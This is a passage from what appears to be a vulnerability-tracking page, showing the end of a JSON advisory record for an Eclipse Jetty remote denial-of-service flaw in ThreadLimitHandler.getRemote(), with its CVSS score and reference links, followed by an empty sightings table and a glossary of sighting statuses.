"url": "https://github.com/jetty/jetty.project"
},
{
"type": "WEB",
"url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/30"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00001.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Eclipse Jetty\u0027s ThreadLimitHandler.getRemote() vulnerable to remote DoS attacks"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.